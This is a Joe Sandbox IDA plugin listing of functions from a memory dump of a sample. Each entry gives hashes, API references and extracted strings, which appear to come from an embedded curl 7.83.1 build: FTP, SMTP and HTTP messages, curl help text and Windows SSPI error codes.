Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l$strcmp
String ID: SMTPUTF8$%s %s%s$EXPN$HELP$VRFY %s%s%s%s
API String ID: 4230950830-2300960079
Opcode ID: 2b968608df519ad54de98174ae744b379c4e95fd54fe13beebec36cd46ce6c6c
Instruction ID: 45148e9dfe41e2d05b2d098826443d08f9f9a1b6855848df20667317e3f74403
Opcode Fuzzy Hash: 2b968608df519ad54de98174ae744b379c4e95fd54fe13beebec36cd46ce6c6c
Instruction Fuzzy Hash: 46518162B0CB8281EB15EB15D8403B9A7B0EF54B84F944532DAAE036D4DFBDE544C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DD4298 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 91COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DD43BD

Strings

REST %I64d, xrefs: 00007FF7F1DD43AC
RETR %s, xrefs: 00007FF7F1DD43DF
File already completely downloaded, xrefs: 00007FF7F1DD436D
Maximum file size exceeded, xrefs: 00007FF7F1DD42C6
Instructs server to resume from offset %I64d, xrefs: 00007FF7F1DD4399
Offset (%I64d) was beyond file size (%I64d), xrefs: 00007FF7F1DD432F
ftp server doesn't support SIZE, xrefs: 00007FF7F1DD42F6

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l
String ID: File already completely downloaded$Instructs server to resume from offset %I64d$Maximum file size exceeded$Offset (%I64d) was beyond file size (%I64d)$REST %I64d$RETR %s$ftp server doesn't support SIZE
API String ID: 1488884202-1529409809
Opcode ID: bee56b47ca032b2390ad3398ec537f7012b15cfead827331f4db812a89521367
Instruction ID: 4aecc1d965d6c14657cafa141a3747c29a455db3afc87477cee11aeda8fb1c6d
Opcode Fuzzy Hash: bee56b47ca032b2390ad3398ec537f7012b15cfead827331f4db812a89521367
Instruction Fuzzy Hash: 8B41A262A0974281EB04EB19E4442B9B3B0EB147A8FD84231DA3D477D5DFBCE191C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA0444 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 81COMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F1D9F917), ref: 00007FF7F1DA0546

Strings

Content-Type: application/json, xrefs: 00007FF7F1DA0492
host, xrefs: 00007FF7F1DA04FE
Accept, xrefs: 00007FF7F1DA04B4
proxy, xrefs: 00007FF7F1DA0523
curl/7.83.1, xrefs: 00007FF7F1DA053F
Accept: application/json, xrefs: 00007FF7F1DA04C7
out of memory, xrefs: 00007FF7F1DA055B
Content-Type, xrefs: 00007FF7F1DA047F

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _strdup
String ID: Accept$Accept: application/json$Content-Type$Content-Type: application/json$curl/7.83.1$host$out of memory$proxy
API String ID: 1169197092-2108368468
Opcode ID: 009e05c5cfe81489adb0076801135eebd16bfa9b97869c28fe556ae7a8bd23ca
Instruction ID: 7b64ba4b36298e275ad6e5a0c2fb8365df625d5c91dcd1e7702fe664a32b8924
Opcode Fuzzy Hash: 009e05c5cfe81489adb0076801135eebd16bfa9b97869c28fe556ae7a8bd23ca
Instruction Fuzzy Hash: 55311E21A09A4392EB55EB1699503B9A7B0FF44780FC80035DA6C473D6DFBDF56583A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D99D3C Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 66COMMON

Download Yara Rule

APIs

puts.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D99D5F
puts.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D99DFD
puts.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D99D7B

Part of subcall function 00007FF7F1DA50D8: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00000050,00007FF7F1D99CBC), ref: 00007FF7F1DA50F9

Strings

all, xrefs: 00007FF7F1D99D86
Invalid category provided, here is a list of all categories:, xrefs: 00007FF7F1D99DF6
%s: %s, xrefs: 00007FF7F1D99E38
This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all"., xrefs: 00007FF7F1D99D74
Usage: curl [options...] <url>, xrefs: 00007FF7F1D99D58
category, xrefs: 00007FF7F1D99DA5

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: puts$__acrt_iob_func
String ID: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".$%s: %s$Invalid category provided, here is a list of all categories:$Usage: curl [options...] <url>$all$category
API String ID: 1292152210-1419887204
Opcode ID: f7184cb644edf7fad2517d2ada4b8365c6cc52b94971f4c97aa5ef37d305f758
Instruction ID: ba4a10c20a7435605ea033d234594afde9387e62223914759f0e7cd089a25df2
Opcode Fuzzy Hash: f7184cb644edf7fad2517d2ada4b8365c6cc52b94971f4c97aa5ef37d305f758
Instruction Fuzzy Hash: 1F316B21A1DA0681EB18BB15D8941B8A371EF44BD4FD04035D93E477E9DFACE50687E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAED05 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C
SEC_E_INVALID_PARAMETER, xrefs: 00007FF7F1DAED05

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_INVALID_PARAMETER
API String ID: 1435330505-1537070967
Opcode ID: 940f7868e7b2f42909865a993612ef6140e3dac1efdbf0aaf0a83290997d1c76
Instruction ID: be724cd658a60b382ff3539613bdc3c909b40ef354caedd06eb5828b8b174f83
Opcode Fuzzy Hash: 940f7868e7b2f42909865a993612ef6140e3dac1efdbf0aaf0a83290997d1c76
Instruction Fuzzy Hash: 00118F22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAECF9 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_INVALID_HANDLE, xrefs: 00007FF7F1DAECF9
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_INVALID_HANDLE
API String ID: 1435330505-4021695947
Opcode ID: 1ccc7f8e97859bc73aa3f76700d79d4a1207450ed5b12cbe54713aae9eb2eb59
Instruction ID: 83ff8d5d28a98672033ca08ddf628a98d836f3f38d0deb31716bd615450039a7
Opcode Fuzzy Hash: 1ccc7f8e97859bc73aa3f76700d79d4a1207450ed5b12cbe54713aae9eb2eb59
Instruction Fuzzy Hash: BA118F22618A4285E7A9FF10A0442FDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAED11 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C
SEC_E_INVALID_TOKEN, xrefs: 00007FF7F1DAED11

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_INVALID_TOKEN
API String ID: 1435330505-3630042646
Opcode ID: 686989267c888d7f23e32433200b644c839d46ceebeaf6b6b217fa87361fa506
Instruction ID: e1e6d627ef57ff3dc17850543352309b94185fa17dc5e50dc38d84f67ebc371f
Opcode Fuzzy Hash: 686989267c888d7f23e32433200b644c839d46ceebeaf6b6b217fa87361fa506
Instruction Fuzzy Hash: E1118F22618A4295E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAECE1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C
SEC_E_INSUFFICIENT_MEMORY, xrefs: 00007FF7F1DAECE1

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_INSUFFICIENT_MEMORY
API String ID: 1435330505-672193982
Opcode ID: 67e681bb56680d3b8d4935495d36cd04192940dde4f6866a3a85344a5c4baf2d
Instruction ID: ebea9e27d96a823354836dd87aa83ca1506fe91e34c89f70188844b9d239d55f
Opcode Fuzzy Hash: 67e681bb56680d3b8d4935495d36cd04192940dde4f6866a3a85344a5c4baf2d
Instruction Fuzzy Hash: 5B118F26618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAECED Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_INTERNAL_ERROR, xrefs: 00007FF7F1DAECED
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_INTERNAL_ERROR
API String ID: 1435330505-2974677361
Opcode ID: b73027b0e82c3415a1cc19ac55154d864395068921df4522c0e00a430fab6bcd
Instruction ID: c095bd11ce94a0637f9efbd4cfdf412d822f495523b9bc546784e1915f97a4a3
Opcode Fuzzy Hash: b73027b0e82c3415a1cc19ac55154d864395068921df4522c0e00a430fab6bcd
Instruction Fuzzy Hash: 95118F22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAECBD Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_ENCRYPT_FAILURE, xrefs: 00007FF7F1DAECBD
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_ENCRYPT_FAILURE
API String ID: 1435330505-3602081711
Opcode ID: a069910b7e16112447585ca2bf66f6aef3820300fc95228b938ef203b0afdc6f
Instruction ID: 463cdf02c9cedf887dfe9551a2ce317f44b6df2f17f4d7b6fc6c8f52e609f02c
Opcode Fuzzy Hash: a069910b7e16112447585ca2bf66f6aef3820300fc95228b938ef203b0afdc6f
Instruction Fuzzy Hash: 48118F22618A4285E7A8FF10A0402FDA375FF88781FC54036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAECD5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_INCOMPLETE_MESSAGE, xrefs: 00007FF7F1DAECD5
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_INCOMPLETE_MESSAGE
API String ID: 1435330505-695297855
Opcode ID: f6d8f430167f9a678a48b3762f0f39f8e2b67f43924b143f0b68908b999fc137
Instruction ID: 0f73a0de9ceec2c6590086e35eb789bc4145af4b72a9966aa2f43802ceec06a2
Opcode Fuzzy Hash: f6d8f430167f9a678a48b3762f0f39f8e2b67f43924b143f0b68908b999fc137
Instruction Fuzzy Hash: 94118F22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCD845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAECC9 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C
SEC_E_INCOMPLETE_CREDENTIALS, xrefs: 00007FF7F1DAECC9

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$FormatMessagestrncpywcstombs
String ID: %s (0x%08X)$%s - %s$SEC_E_INCOMPLETE_CREDENTIALS
API String ID: 1435330505-965260069
Opcode ID: 093c31c1eed8a8e606177ce2d0f43c12cfdabb9527c4b5f6908968dc43e67d88
Instruction ID: 07e48cfb1e86192f95d3bbdbaca541e4a3d93b1e52efdaea0f3c612988470cfe
Opcode Fuzzy Hash: 093c31c1eed8a8e606177ce2d0f43c12cfdabb9527c4b5f6908968dc43e67d88
Instruction Fuzzy Hash: A7118F22618A4285E7A8FF10A0402FDA375FF88781FC14036D9AE027D6DFBCE845C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAECA5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 44stringCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DAF021

Part of subcall function 00007FF7F1DAE900: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7F1DAE951
Part of subcall function 00007FF7F1DAE900: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DAE967

__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_E_DELEGATION_REQUIRED, xrefs: 00007FF7F1DAECA5
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
